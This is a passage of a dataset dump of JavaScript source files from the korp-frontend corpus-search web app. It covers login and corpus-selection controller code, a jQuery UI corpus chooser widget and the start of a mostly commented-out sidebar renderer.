(corpusObj) {\n initialCorpora.push(corpusObj)\n } else {\n // corpus does not correspond to a corpus ID, check if it is a folder\n for (let folderCorpus of findInFolder(settings.corporafolders[corpus])) {\n if (settings.corpusListing.struct[folderCorpus]) {\n initialCorpora.push(settings.corpusListing.struct[folderCorpus])\n }\n }\n }\n }\n\n const loginNeededFor = []\n for (let corpusObj of initialCorpora) {\n if (corpusObj.limitedAccess) {\n if (\n _.isEmpty(authenticationProxy.loginObj) ||\n !authenticationProxy.loginObj.credentials.includes(corpusObj.id.toUpperCase())\n ) {\n loginNeededFor.push(corpusObj)\n }\n }\n }\n s.loginNeededFor = loginNeededFor\n\n if (!_.isEmpty(s.loginNeededFor)) {\n s.savedState = $location.search()\n $location.url($location.path())\n\n // some state need special treatment\n if (s.savedState.reading_mode) {\n $location.search(\"reading_mode\")\n }\n if (s.savedState.search_tab) {\n $location.search(\"search_tab\", s.savedState.search_tab)\n }\n if (s.savedState.cqp) {\n $location.search(\"cqp\", s.savedState.cqp)\n }\n\n $location.search(\"display\", \"login\")\n }\n }\n\n s.restorePreLoginState = function () {\n if (s.savedState) {\n for (let key in s.savedState) {\n const val = s.savedState[key]\n if (key !== \"search_tab\") {\n $location.search(key, val)\n }\n }\n\n // some state need special treatment\n s.$broadcast(\"updateAdvancedCQP\")\n\n const corpora = s.savedState.corpus.split(\",\")\n settings.corpusListing.select(corpora)\n corpusChooserInstance.corpusChooser(\"selectItems\", corpora)\n\n s.savedState = null\n s.loginNeededFor = null\n }\n }\n\n s.searchDisabled = false\n s.$on(\"corpuschooserchange\", function (event, corpora) {\n settings.corpusListing.select(corpora)\n const nonprotected = _.map(settings.corpusListing.getNonProtected(), \"id\")\n if (\n corpora.length &&\n _.intersection(corpora, nonprotected).length !== nonprotected.length\n ) {\n $location.search(\"corpus\", corpora.join(\",\"))\n } else {\n $location.search(\"corpus\", null)\n }\n s.searchDisabled = settings.corpusListing.selected.length === 0\n })\n\n searches.infoDef.then(function () {\n let { corpus } = $location.search()\n let currentCorpora = []\n if (corpus) {\n currentCorpora = _.flatten(\n _.map(corpus.split(\",\"), (val) =>\n getAllCorporaInFolders(settings.corporafolders, val)\n )\n )\n } else {\n if (!(settings.preselectedCorpora && settings.preselectedCorpora.length)) {\n currentCorpora = _.map(settings.corpusListing.corpora, \"id\")\n } else {\n for (let pre_item of settings.preselectedCorpora) {\n pre_item = pre_item.replace(/^__/g, \"\")\n currentCorpora = [].concat(\n currentCorpora,\n getAllCorporaInFolders(settings.corporafolders, pre_item)\n )\n }\n }\n\n settings.preselectedCorpora = currentCorpora\n }\n\n settings.corpusListing.select(currentCorpora)\n corpusChooserInstance.corpusChooser(\"selectItems\", currentCorpora)\n })\n})\n\nkorpApp.controller(\"headerCtrl\", function ($scope, $uibModal, utils) {\n const s = $scope\n\n s.logoClick = function () {\n const [baseUrl, modeParam, langParam] = $scope.getUrlParts(currentMode)\n window.location = baseUrl + modeParam + langParam\n if (langParam.length > 0) {\n window.location.reload()\n }\n }\n\n s.citeClick = () => {\n s.show_modal = \"about\"\n }\n\n s.showLogin = () => {\n s.show_modal = \"login\"\n }\n\n s.logout = function () {\n authenticationProxy.loginObj = {}\n jStorage.deleteKey(\"creds\")\n\n // TODO figure out another way to do this\n for (let corpusObj of settings.corpusListing.corpora) {\n const corpus = corpusObj.id\n if (corpusObj.limitedAccess) {\n $(`#hpcorpus_${corpus}`).closest(\".boxdiv\").addClass(\"disabled\")\n }\n }\n $(\"#corpusbox\").corpusChooser(\"updateAllStates\")\n\n let newCorpora = []\n for (let corpus of settings.corpusListing.getSelectedCorpora()) {\n if (!settings.corpora[corpus].limitedAccess) {\n newCorpora.push(corpus)\n }\n }\n\n if (_.isEmpty(newCorpora)) {\n newCorpora = settings.preselectedCorpora\n }\n settings.corpusListing.select(newCorpora)\n s.loggedIn = false\n $(\"#corpusbox\").corpusChooser(\"selectItems\", newCorpora)\n }\n\n const N_VISIBLE = settings.visibleModes\n\n s.modes = _.filter(settings.modeConfig)\n if (!isLab) {\n s.modes = _.filter(settings.modeConfig, (item) => item.labOnly !== true)\n }\n\n s.visible = s.modes.slice(0, N_VISIBLE)\n s.menu = s.modes.slice(N_VISIBLE)\n\n const i = _.map(s.menu, \"mode\").indexOf(currentMode)\n if (i !== -1) {\n s.visible.push(s.menu[i])\n s.menu.splice(i, 1)\n }\n\n for (let mode of s.modes) {\n mode.selected = false\n if (mode.mode === currentMode) {\n mode.selected = true\n }\n }\n\n s.getUrl = function (modeId) {\n return s.getUrlParts(modeId).join(\"\")\n }\n\n s.getUrlParts = function (modeId) {\n const langParam = settings.defaultLanguage === s.$root.lang ? \"\" : `#?lang=${s.$root.lang}`\n const modeParam = modeId === \"default\" ? \"\" : `?mode=${modeId}`\n return [location.pathname, modeParam, langParam]\n }\n\n s.show_modal = false\n\n let modal = null\n utils.setupHash(s, [\n {\n key: \"display\",\n scope_name: \"show_modal\",\n post_change(val) {\n if (val) {\n showModal(val)\n } else {\n if (modal != null) {\n modal.close()\n }\n modal = null\n }\n },\n },\n ])\n\n const closeModals = function () {\n s.login_err = false\n s.show_modal = false\n }\n\n var showModal = function (key) {\n const tmpl = { about: require(\"../markup/about.html\"), login: \"login_modal\" }[key]\n const params = {\n templateUrl: tmpl,\n scope: s,\n windowClass: key,\n }\n if (key === \"login\") {\n params.size = \"sm\"\n }\n modal = $uibModal.open(params)\n\n modal.result.then(\n () => closeModals(),\n () => closeModals()\n )\n }\n\n s.clickX = () => closeModals()\n\n s.loggedIn = false\n const creds = jStorage.get(\"creds\")\n if (creds) {\n util.setLogin()\n s.loggedIn = true\n s.username = authenticationProxy.loginObj.name\n }\n s.loginSubmit = function (usr, pass, saveLogin) {\n s.login_err = false\n authenticationProxy\n .makeRequest(usr, pass, saveLogin)\n .done(function () {\n util.setLogin()\n safeApply(s, function () {\n s.show_modal = null\n s.restorePreLoginState()\n s.loggedIn = true\n s.username = usr\n })\n })\n .fail(function () {\n c.log(\"login fail\")\n safeApply(s, () => {\n s.login_err = true\n })\n })\n }\n})\n\nkorpApp.filter(\"trust\", ($sce) => (input) => $sce.trustAsHtml(input))\n"
},
{
"alpha_fraction": 0.4358167350292206,
"alphanum_fraction": 0.43878424167633057,
"avg_line_length": 39.88418960571289,
"blob_id": "142572e2cba8684fda1cca55226f8c0417e24b26",
"content_id": "d353dab104045f92d0a9457b3f7d690adc9e1ddb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 22244,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 544,
"path": "/app/scripts/selector_widget.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/** @format */\n\nvar collapsedImg = require(\"../img/collapsed.png\")\nvar hp_this\nvar hp_corpusChooser = {\n options: {\n template: \"\",\n },\n\n _create: function () {\n this.totalTokenCount = 0\n this._transform()\n var self = this\n\n this.updateAllStates()\n\n // Make the popup disappear when the user clicks outside it\n $(window).unbind(\"click.corpusselector\")\n $(window).bind(\"click.corpusselector\", function (e) {\n if ($(\".popupchecks\").is(\":visible\") && e.target != self) {\n $(\".popupchecks\").fadeOut(\"fast\")\n $(\".corpusInfoSpace\").fadeOut(\"fast\")\n $(\".hp_topframe\").removeClass(\"ui-corner-top\")\n }\n })\n\n $(\".buttonlink, ul#icons li\").hover(\n function () {\n $(this).addClass(\"ui-state-hover\")\n },\n function () {\n $(this).removeClass(\"ui-state-hover\")\n }\n )\n },\n isSelected: function (id) {\n // Test if a given id is selected\n var cb = $(\"#\" + id)\n return cb.hasClass(\"checked\")\n },\n selectedItems: function () {\n // Return all ids that are selected\n var IDArray = []\n var allboxes = $(\".boxdiv label .checked\")\n allboxes.each(function () {\n var idstring = $(this).attr(\"id\")\n if (idstring != \"\") {\n IDArray.push(idstring.slice(9))\n }\n })\n return IDArray\n },\n selectItems: function (item_ids) {\n item_ids = $.map(item_ids, function (item) {\n return \"hpcorpus_\" + item\n })\n // Check items from outside\n var allboxes = $(\".checkbox\")\n allboxes.each(function () {\n /* First clear all items */\n hp_this.setStatus($(this), \"unchecked\")\n })\n var realboxes = $(\".boxdiv\")\n realboxes.each(function () {\n var chk = $(\".checkbox\", this)\n if ($.inArray(chk.attr(\"id\"), item_ids) != -1 && !$(this).is(\".disabled\")) {\n /* Change status of item */\n hp_this.setStatus(chk, \"checked\")\n hp_this.updateState(chk) // <-?\n var ancestors = chk.parents(\".tree\")\n ancestors.each(function () {\n hp_this.updateState($(this))\n })\n }\n })\n this.countSelected()\n // Fire callback \"change\":\n hp_this.triggerChange()\n },\n updateAllStates: function () {\n var self = this\n $(\".tree\").each(function () {\n self.updateState($(this))\n })\n },\n updateState: function (element) {\n // element is a div!\n var descendants = element.find(\".checkbox\")\n var numbOfChecked = 0\n var numbOfUnchecked = 0\n descendants.each(function () {\n if (!$(this).parent().parent().hasClass(\"tree\")) {\n if ($(this).hasClass(\"checked\")) {\n numbOfChecked++\n } else if ($(this).hasClass(\"unchecked\")) {\n numbOfUnchecked++\n }\n }\n })\n var theBox = element.children(\"label\").children(\".checkbox\")\n if (numbOfUnchecked > 0 && numbOfChecked > 0) {\n this.setStatus(theBox, \"intermediate\") // Intermediate\n } else if (numbOfUnchecked > 0 && numbOfChecked == 0) {\n this.setStatus(theBox, \"unchecked\") // Unchecked\n } else if (numbOfChecked > 0 && numbOfUnchecked == 0) {\n this.setStatus(theBox, \"checked\") // Checked\n }\n\n var numDisabled = element.find(\".disabled\").length\n if (element.find(\".boxdiv\").length === numDisabled && numDisabled > 0) {\n element.addClass(\"disabled\")\n } else {\n element.removeClass(\"disabled\")\n }\n },\n setStatus: function (obj, stat) {\n /* Change status of item */\n obj.removeClass(\"intermediate unchecked checked\")\n if (stat == \"checked\") {\n obj.addClass(\"checked\")\n } else if (stat == \"intermediate\") {\n obj.addClass(\"intermediate\")\n } else {\n obj.addClass(\"unchecked\")\n }\n },\n countSelected: function () {\n /* Update header */\n var header_text = \"\"\n var header_text_2 = \"\"\n var header_total = \"\"\n var header_of = false\n var checked_checkboxes = $(\".hplabel .checked\")\n var num_checked_checkboxes = checked_checkboxes.length\n var num_unchecked_checkboxes = $(\".hplabel .unchecked\").length\n var num_checkboxes = $(\".hplabel .checkbox\").length\n // if (num_unchecked_checkboxes == num_checkboxes) {\n // header_text_2 = 'corpselector_noneselected';\n // } else\n if (num_checked_checkboxes == num_checkboxes && num_checkboxes > 1) {\n header_text = num_checked_checkboxes\n header_text_2 = \"corpselector_allselected\"\n } else if (num_checked_checkboxes == 1) {\n var currentCorpusName = checked_checkboxes.parent().parent().attr(\"data\")\n if (currentCorpusName.length > 37) {\n // Ellipsis\n currentCorpusName = _.trim(currentCorpusName.substr(0, 37)) + \"...\"\n }\n header_text = currentCorpusName\n header_text_2 = \"corpselector_selectedone\"\n } else {\n header_text = num_checked_checkboxes\n header_text_2 = \"corpselector_selectedmultiple\"\n header_total = $(\".popupchecks\").find(\".hplabel\").length\n header_of = true\n }\n\n // Number of tokens\n var selectedNumberOfTokens = 0\n var selectedNumberOfSentences = 0\n checked_checkboxes.each(function (key, corpItem) {\n var corpusID = $(this).attr(\"id\").slice(9)\n selectedNumberOfTokens += parseInt(settings.corpora[corpusID][\"info\"][\"Size\"])\n var numSen = parseInt(settings.corpora[corpusID][\"info\"][\"Sentences\"])\n if (!isNaN(numSen)) selectedNumberOfSentences += numSen\n })\n var totalNumberOfTokens = this.totalTokenCount\n\n $(\"#hp_corpora_title1\").text(header_text)\n $(\"#hp_corpora_titleOf\").toggle(header_of)\n $(\"#hp_corpora_titleTotal\").text(header_total)\n $(\"#hp_corpora_title2\").attr({ rel: \"localize[\" + header_text_2 + \"]\" })\n $(\"#hp_corpora_title2\").text(util.getLocaleString(header_text_2))\n $(\"#hp_corpora_titleTokens\")\n .html(\n \" — \" +\n util.suffixedNumbers(selectedNumberOfTokens.toString()) +\n '<span rel=\"localize[corpselector_of]\">' +\n util.getLocaleString(\"corpselector_of\") +\n \"</span>\" +\n util.suffixedNumbers(totalNumberOfTokens.toString()) +\n \" \"\n )\n .append($(\"<span>\").localeKey(\"corpselector_tokens\"))\n $(\"#sentenceCounter\")\n .html(util.prettyNumbers(selectedNumberOfSentences.toString()) + \" \")\n .append($(\"<span>\").localeKey(\"corpselector_sentences_long\"))\n },\n triggerChange: function () {\n this._trigger(\"change\", null, [this.selectedItems()])\n },\n\n redraw: function () {\n this._transform()\n },\n\n _transform: function () {\n var el = this.element\n hp_this = this\n var body\n if (this.options.template != \"\") {\n body = this.options.template\n } else {\n body = el.html()\n }\n\n var newHTML = recursive_transform(body, 0)\n $(\".popupchecks .checks\").html(newHTML)\n\n // el.addClass(\"scroll_checkboxes inline_block\");\n var pos = $(\".scroll_checkboxes\").offset().left + 434\n $(\".corpusInfoSpace\")\n .css({ left: pos.toString() + \"px\" })\n .click(function (event) {\n var target = event.target\n if (!$(target).is(\"a\")) return false\n })\n\n hp_this.countSelected()\n // Update the number of children for all folders:\n $(\".tree\").each(function () {\n var noItems = $(this).find(\".hplabel .checkbox\").length\n $(this)\n .children(\"label\")\n .children(\".numberOfChildren\")\n .text(\"(\" + noItems + \")\")\n })\n\n var popoffset = $(\".scroll_checkboxes\").position().top + $(\".scroll_checkboxes\").height()\n\n $(\".scroll_checkboxes\").unbind(\"mousedown\")\n $(\".scroll_checkboxes\").mousedown(function (e) {\n if ($(this).siblings(\".popupchecks\").css(\"display\") == \"block\") {\n $(\".popupchecks\").fadeOut(\"fast\")\n $(\".corpusInfoSpace\").fadeOut(\"fast\")\n $(\".hp_topframe\").removeClass(\"ui-corner-top\")\n } else {\n $(\".popupchecks\")\n .show()\n .css({\n position: \"absolute\",\n top: $(\"#corpusbox\").offset().top + $(\"#corpusbox\").height() - 2,\n left: $(\"#corpusbox\").offset().left,\n })\n hp_this._trigger(\"open\")\n $(\".hp_topframe\").addClass(\"ui-corner-top\")\n }\n e.stopPropagation()\n })\n\n $(\".scroll_checkboxes\")\n .unbind(\"click\")\n .click(function (e) {\n e.stopPropagation()\n })\n\n // Prevent clicking through the box\n $(\".popupchecks\")\n .unbind(\"click\")\n .click(function (e) {\n e.stopPropagation()\n })\n\n /* SELECT ALL BUTTON */\n $(\".selectall\")\n .unbind(\"click\")\n .click(function () {\n hp_this.setStatus(\n $(\".boxlabel .checkbox, div.checks .boxdiv:not(.disabled) .checkbox\"),\n \"checked\"\n )\n hp_this.countSelected()\n // Fire callback \"change\":\n hp_this.triggerChange()\n return false\n })\n\n /* SELECT NONE BUTTON */\n $(\".selectnone\")\n .unbind(\"click\")\n .click(function () {\n hp_this.setStatus(\n $(\".boxlabel .checkbox, div.checks .boxdiv:not(.disabled) .checkbox\"),\n \"unchecked\"\n )\n hp_this.countSelected()\n // Fire callback \"change\":\n hp_this.triggerChange()\n return false\n })\n\n $(\".ext\")\n .unbind(\"click\")\n .click(function () {\n $(\".corpusInfoSpace\").fadeOut(\"fast\")\n if ($(this).parent().hasClass(\"collapsed\")) {\n $(this).parent().removeClass(\"collapsed\").addClass(\"extended\")\n $(this).siblings(\"div\").fadeToggle(\"fast\")\n } else {\n $(this).parent().removeClass(\"extended\").addClass(\"collapsed\")\n $(this).siblings(\"div\").fadeToggle(\"fast\")\n }\n })\n\n $(\".boxlabel\")\n .unbind(\"click\") // \"folders\"\n .click(function (event) {\n let isLinux = window.navigator.userAgent.indexOf(\"Linux\") != -1\n\n if (!$(this).parent().hasClass(\"disabled\")) {\n if (!isLinux && event.altKey == 1) {\n $(\".checkbox\").each(function () {\n hp_this.setStatus($(this), \"unchecked\")\n })\n } else if (isLinux && event.ctrlKey == 1) {\n $(\".checkbox\").each(function () {\n hp_this.setStatus($(this), \"unchecked\")\n })\n }\n if ($(this).is(\".disabled\")) return\n hp_this.updateState($(this).parent())\n var childMan = $(this).children(\".checkbox\")\n var checkedAllUnlocked =\n childMan.hasClass(\"intermediate\") &&\n childMan.parent().siblings(\"div:not(.disabled)\").length ===\n childMan.parent().siblings().find(\".checked\").length\n if (childMan.hasClass(\"checked\") || checkedAllUnlocked) {\n // Checked, uncheck it if not the root of a tree\n if (!$(this).parent().hasClass(\"tree\")) {\n hp_this.setStatus(childMan, \"unchecked\")\n } else {\n var descendants = childMan.parent().siblings(\"div\").find(\".checkbox\")\n hp_this.setStatus(descendants, \"unchecked\")\n }\n } else {\n // Unchecked, check it unless it's intermediate and all unchecked ones are locked\n hp_this.setStatus(childMan, \"checked\")\n if ($(this).parent().hasClass(\"tree\")) {\n // If tree, check all descendants\n descendants = childMan\n .parent()\n .siblings(\"div:not(.disabled)\")\n .find(\".checkbox\")\n hp_this.setStatus(descendants, \"checked\")\n }\n }\n var ancestors = childMan.parents(\".tree\")\n ancestors.each(function () {\n hp_this.updateState($(this))\n })\n hp_this.countSelected()\n // Fire callback \"change\":\n hp_this.triggerChange()\n }\n })\n\n var hoverConfig = {\n over: function () {\n // Fire callback \"infoPopup\":\n var callback = hp_this.options.infoPopup\n var returnValue = \"\"\n var inValue = \"\"\n var idstring = $(this).find(\"span\").attr(\"id\")\n if (idstring != \"\") {\n inValue = idstring.slice(9)\n }\n if ($.isFunction(callback)) returnValue = callback(inValue)\n $(\".corpusInfoSpace\").css({ top: $(this).offset().top })\n $(\".corpusInfoSpace\").find(\"p\").html(returnValue)\n $(\".corpusInfoSpace\").fadeIn(\"fast\")\n // $(\".corpusInfoSpace\").css({\"display\": \"block\"});\n },\n interval: 200, // number = milliseconds delay before onMouseOut\n out: function () {\n /* $(\".corpusInfoSpace\").fadeOut('fast');\n //$(\".corpusInfoSpace\").css({\"display\": \"none\"}); */\n },\n }\n\n var hoverFolderConfig = {\n over: function () {\n var callback = hp_this.options.infoPopupFolder\n var returnValue = \"\"\n var indata = []\n var boxes = $(this).parent().find(\".boxdiv\")\n var corpusID = []\n boxes.each(function (index) {\n corpusID.push($(this).find(\"span\").attr(\"id\").slice(9))\n })\n indata[\"corporaID\"] = corpusID\n var desc = $(this).parent().attr(\"data\").split(\"___\")[1]\n if (!desc) {\n desc = \"\"\n }\n indata[\"description\"] = unescape(desc)\n indata[\"title\"] = $(this).parent().attr(\"data\").split(\"___\")[0]\n if ($.isFunction(callback)) returnValue = callback(indata)\n $(\".corpusInfoSpace\").css({\n top: $(this).parent().offset().top,\n })\n $(\".corpusInfoSpace\").find(\"p\").html(returnValue)\n $(\".corpusInfoSpace\").fadeIn(\"fast\")\n },\n interval: 200,\n out: function () {},\n }\n\n $(\".boxdiv\").hoverIntent(hoverConfig)\n $(\".boxlabel\").hoverIntent(hoverFolderConfig)\n\n $(\".boxdiv\").unbind(\"click\") // \"Non-folder items\"\n $(\".boxdiv\").click(function (event) {\n if ($(this).is(\".disabled\")) return\n let isLinux = window.navigator.userAgent.indexOf(\"Linux\") != -1\n if (!isLinux && event.altKey == 1) {\n $(\".checkbox\").each(function () {\n hp_this.setStatus($(this), \"unchecked\")\n })\n } else if (isLinux && event.ctrlKey == 1) {\n $(\".checkbox\").each(function () {\n hp_this.setStatus($(this), \"unchecked\")\n })\n }\n\n hp_this.updateState($(this))\n var childMan = $(this).children(\"label\").children(\".checkbox\")\n if (childMan.hasClass(\"checked\")) {\n hp_this.setStatus(childMan, \"unchecked\")\n } else {\n hp_this.setStatus(childMan, \"checked\")\n }\n var ancestors = childMan.parents(\".tree\")\n ancestors.each(function () {\n hp_this.updateState($(this))\n })\n hp_this.countSelected()\n // Fire callback \"change\":\n hp_this.triggerChange()\n })\n function wrapWithSpan(htmlStr) {\n return \"<span>\" + htmlStr + \"</span>\"\n }\n function recursive_transform(einHTML, levelindent) {\n var outStr = \"\"\n var ul = $(einHTML).children()\n var hasDirectCorporaChildren = false\n ul = ul.each(function (index) {\n var theHTML = $(this).html()\n if (theHTML != null) {\n var leftattrib = 0\n var item_id = $(this).attr(\"id\")\n if (item_id == null) item_id = \"\"\n\n if (item_id != \"\") {\n hp_this.totalTokenCount += parseInt(\n settings.corpora[item_id][\"info\"][\"Size\"]\n )\n item_id = \"hpcorpus_\" + item_id\n }\n\n if (theHTML.indexOf(\"<li\") != -1 || theHTML.indexOf(\"<LI\") != -1) {\n var cssattrib = \"\"\n if (levelindent > 0) {\n leftattrib = 30\n cssattrib += \"margin-left:\" + leftattrib + \"px; display:none\"\n }\n var foldertitle = $(this).children(\"ul\").attr(\"title\")\n var folderdescription = $(this).children(\"ul\").attr(\"description\")\n if (folderdescription == \"undefined\") folderdescription = \"\"\n outStr +=\n '<div data=\"' +\n foldertitle +\n \"___\" +\n folderdescription +\n '\" style=\"' +\n cssattrib +\n '\" class=\"tree collapsed ' +\n levelindent +\n '\"><img src=\"' +\n collapsedImg +\n '\" alt=\"extend\" class=\"ext\"/> <label class=\"boxlabel\"><span id=\"' +\n item_id +\n '\" class=\"checkbox checked\"/> <span>' +\n foldertitle +\n ' </span><span class=\"numberOfChildren\">(?)</span></label>'\n\n outStr += recursive_transform(theHTML, levelindent + 1)\n outStr += \"</div>\"\n } else {\n var disable =\n settings.corpora[$(this).attr(\"id\")].limitedAccess === true &&\n !authenticationProxy.hasCred($(this).attr(\"id\"))\n\n if (levelindent > 0) {\n // Indragna och gömda per default\n hasDirectCorporaChildren = true\n outStr +=\n '<div data=\"' +\n theHTML +\n '\" class=\"boxdiv' +\n (disable ? \" disabled\" : \"\") +\n '\" style=\"margin-left:46px; display:none; background-color:' +\n settings.primaryColor +\n '\"><label class=\"hplabel\"><span id=\"' +\n item_id +\n '\" class=\"checkbox ' +\n (disable ? \" unchecked\" : \"checked\") +\n '\"></span> ' +\n wrapWithSpan(theHTML) +\n \" </label></div>\"\n } else {\n if (index != ul.length) {\n hasDirectCorporaChildren = true\n outStr +=\n '<div data=\"' +\n theHTML +\n '\" class=\"boxdiv' +\n (disable ? \" disabled\" : \"\") +\n '\" style=\"margin-left:16px; background-color:' +\n settings.primaryColor +\n '\"><label class=\"hplabel\"><span id=\"' +\n item_id +\n '\" class=\"checkbox ' +\n (disable ? \" unchecked\" : \"checked\") +\n '\"></span> ' +\n wrapWithSpan(theHTML) +\n \" </label></div>\"\n }\n }\n }\n }\n })\n if (!hasDirectCorporaChildren) {\n outStr +=\n '<div class=\"extra_fill\" style=\"height:2px; display:none; visible:false\"></div>'\n }\n\n return outStr\n }\n },\n}\n\nlet widget = require(\"components-jqueryui/ui/widget\")\nwidget(\"hp.corpusChooser\", hp_corpusChooser) // create the widget\n"
},
{
"alpha_fraction": 0.381863534450531,
"alphanum_fraction": 0.38459694385528564,
"avg_line_length": 38.12382888793945,
"blob_id": "328ec6f4ae4c67c476a3e460ac46df927fd57c21",
"content_id": "f678c171a2e6434667a222de9e42813b808c8c56",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 20853,
"license_type": "permissive",
"max_line_length": 125,
"num_lines": 533,
"path": "/app/scripts/widgets.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/** @format */\nlet widget = require(\"components-jqueryui/ui/widget\")\n// const Sidebar = {\n// _init() {},\n\n// updateContent(sentenceData, wordData, corpus, tokens, inReadingMode) {\n// this.element.html('<div id=\"selected_sentence\" /><div id=\"selected_word\" />')\n// // TODO: this is pretty broken\n// const corpusObj = settings.corpora[corpus] || settings.corpusListing.get(corpus)\n\n// const corpusInfo = $(\"<div />\").html(\n// `<h4 rel='localize[corpus]'></h4> <p>${corpusObj.title}</p>`\n// )\n// corpusInfo.prependTo(\"#selected_sentence\")\n\n// if (!inReadingMode && corpusObj.readingMode) {\n// $(\"<div class='openReadingMode'/>\")\n// .html(`<span class=\"link\" rel=\"localize[read_in_korp]\"></span>`)\n// .click(function () {\n// const aScope = angular\n// .element(document.getElementById(\"results-wrapper\"))\n// .scope()\n// safeApply(aScope.$root, () =>\n// aScope.$root.textTabs.push({\n// corpus: corpus,\n// sentenceId: sentenceData.sentence_id,\n// })\n// )\n// })\n// .prependTo(corpusInfo)\n// }\n\n// const customData = { pos: [], struct: [] }\n// if (!$.isEmptyObject(corpusObj.customAttributes)) {\n// const [word, sentence] = this.renderCustomContent(\n// wordData,\n// sentenceData,\n// corpusObj.customAttributes,\n// tokens\n// )\n// customData.pos = word\n// customData.struct = sentence\n// }\n\n// let posData = []\n// if (!$.isEmptyObject(corpusObj.attributes)) {\n// posData = this.renderCorpusContent(\n// \"pos\",\n// wordData,\n// sentenceData,\n// corpusObj.attributes,\n// tokens,\n// corpusObj.customAttributes || {},\n// customData.pos\n// )\n// }\n// let structData = []\n// if (!$.isEmptyObject(corpusObj.structAttributes)) {\n// structData = this.renderCorpusContent(\n// \"struct\",\n// wordData,\n// sentenceData,\n// corpusObj.structAttributes,\n// tokens,\n// corpusObj.customAttributes || {},\n// customData.struct\n// )\n// }\n\n// $(\"#selected_word\").append($(\"<h4>\").localeKey(\"word_attr\"))\n// $(\"#selected_sentence\").append($(\"<h4>\").localeKey(\"sentence_attr\"))\n// $(\"#selected_word\").append(posData)\n// $(\"#selected_sentence\").append(structData)\n\n// this.element.localize()\n// this.applyEllipse()\n// if (corpusObj.attributes.deprel) {\n// this.renderGraph(tokens)\n// }\n// },\n\n// renderGraph(tokens) {\n// if (!tokens || tokens.length == 0) {\n// return\n// }\n// $(\"<span class='link show_deptree'></button>\")\n// .localeKey(\"show_deptree\")\n// .click(function () {\n// const outerW = $(window).width() - 80\n// const info = $(\"<span class='info' />\")\n// const iframe = $('<iframe src=\"lib/deptrees/deptrees.html\"></iframe>')\n// .css(\"width\", outerW - 40)\n// .on(\"load\", function () {\n// const wnd = this.contentWindow\n// wnd.draw_deptree.call(wnd, tokens, function (msg) {\n// const [type, val] = _.head(_.toPairs(msg))\n// info.empty().append(\n// $(\"<span>\").localeKey(type),\n// $(\"<span>: </span>\"),\n// $(\"<span>\").localeKey(`${type}_${val}`)\n// )\n// })\n// })\n\n// $(\"#deptree_popup\")\n// .empty()\n// .append(info, iframe)\n// .dialog({\n// height: 300,\n// width: outerW,\n// })\n// .parent()\n// .find(\".ui-dialog-title\")\n// .localeKey(\"dep_tree\")\n// })\n// .appendTo(this.element)\n// },\n\n// renderCorpusContent(\n// type,\n// wordData,\n// sentenceData,\n// corpus_attrs,\n// tokens,\n// customAttrs,\n// customData\n// ) {\n// let pairs\n// if (type === \"struct\") {\n// pairs = _.toPairs(sentenceData)\n// } else if (type === \"pos\") {\n// pairs = _.toPairs(wordData)\n// }\n\n// pairs = _.filter(pairs, function (...args) {\n// let [key, val] = args[0]\n// return corpus_attrs[key]\n// })\n// pairs = _.filter(pairs, function (...args) {\n// let [key, val] = args[0]\n// return !(corpus_attrs[key].displayType === \"hidden\" || corpus_attrs[key].hideSidebar)\n// })\n\n// for (let custom of customData) {\n// pairs.push(custom)\n// }\n\n// pairs.sort(function (...args) {\n// let ord1, ord2\n// const [a] = args[0]\n// const [b] = args[1]\n// if (a in corpus_attrs) {\n// ord1 = corpus_attrs[a].order\n// } else {\n// ord1 = customAttrs[a].order\n// }\n\n// if (b in corpus_attrs) {\n// ord2 = corpus_attrs[b].order\n// } else {\n// ord2 = customAttrs[b].order\n// }\n\n// if (_.isUndefined(ord1)) {\n// ord1 = 10000\n// }\n// if (_.isUndefined(ord2)) {\n// ord2 = 10000\n// }\n// return ord1 - ord2\n// })\n\n// let items = []\n// for (let [key, value] of pairs) {\n// if (key in customAttrs) {\n// items.push(value)\n// } else {\n// items = items.concat(\n// (\n// this.renderItem(\n// key,\n// value,\n// corpus_attrs[key],\n// wordData,\n// sentenceData,\n// tokens\n// ) || $()\n// ).get(0) || []\n// )\n// }\n// }\n\n// items = _.compact(items)\n// return $(items)\n// },\n\n// renderCustomContent(wordData, sentenceData, corpus_attrs, tokens) {\n// const structItems = []\n// const posItems = []\n// for (let key in corpus_attrs) {\n// const attrs = corpus_attrs[key]\n// try {\n// const output = (\n// this.renderItem(key, \"not_used\", attrs, wordData, sentenceData, tokens) || $()\n// ).get(0)\n// if (attrs.customType === \"struct\") {\n// structItems.push([key, output])\n// } else if (attrs.customType === \"pos\") {\n// posItems.push([key, output])\n// }\n// } catch (e) {\n// c.log(\"failed to render custom attribute\", e)\n// }\n// }\n// return [posItems, structItems]\n// },\n\n// renderItem(key, value, attrs, wordData, sentenceData, tokens) {\n// let lis, output, pattern, ul, valueArray\n// let val, inner, cqpVal, li, address\n// if (attrs.label) {\n// output = $(`<p><span rel='localize[${attrs.label}]'></span>: </p>`)\n// } else {\n// output = $(\"<p></p>\")\n// }\n// if (attrs.renderItem) {\n// return output.append(\n// attrs.renderItem(key, value, attrs, wordData, sentenceData, tokens)\n// )\n// }\n\n// output.data(\"attrs\", attrs)\n// if (value === \"|\" || value === \"\" || value === null) {\n// output.append(\n// `<i rel='localize[empty]' style='color : grey'>${util.getLocaleString(\"empty\")}</i>`\n// )\n// return output\n// }\n\n// if (attrs.type === \"set\" && attrs.display && attrs.display.expandList) {\n// valueArray = _.filter((value && value.split(\"|\")) || [], Boolean)\n// const attrSettings = attrs.display.expandList\n// if (attrs.ranked) {\n// valueArray = _.map(valueArray, function (value) {\n// val = value.split(\":\")\n// return [val[0], val[val.length - 1]]\n// })\n\n// lis = []\n\n// for (let outerIdx = 0; outerIdx < valueArray.length; outerIdx++) {\n// var externalLink\n// let [value, prob] = valueArray[outerIdx]\n// li = $(\"<li></li>\")\n// const subValues = attrSettings.splitValue\n// ? attrSettings.splitValue(value)\n// : [value]\n// for (let idx = 0; idx < subValues.length; idx++) {\n// const subValue = subValues[idx]\n// val = (attrs.stringify || attrSettings.stringify || _.identity)(subValue)\n// inner = $(`<span>${val}</span>`)\n// inner.attr(\"title\", prob)\n\n// if (\n// attrs.internalSearch &&\n// 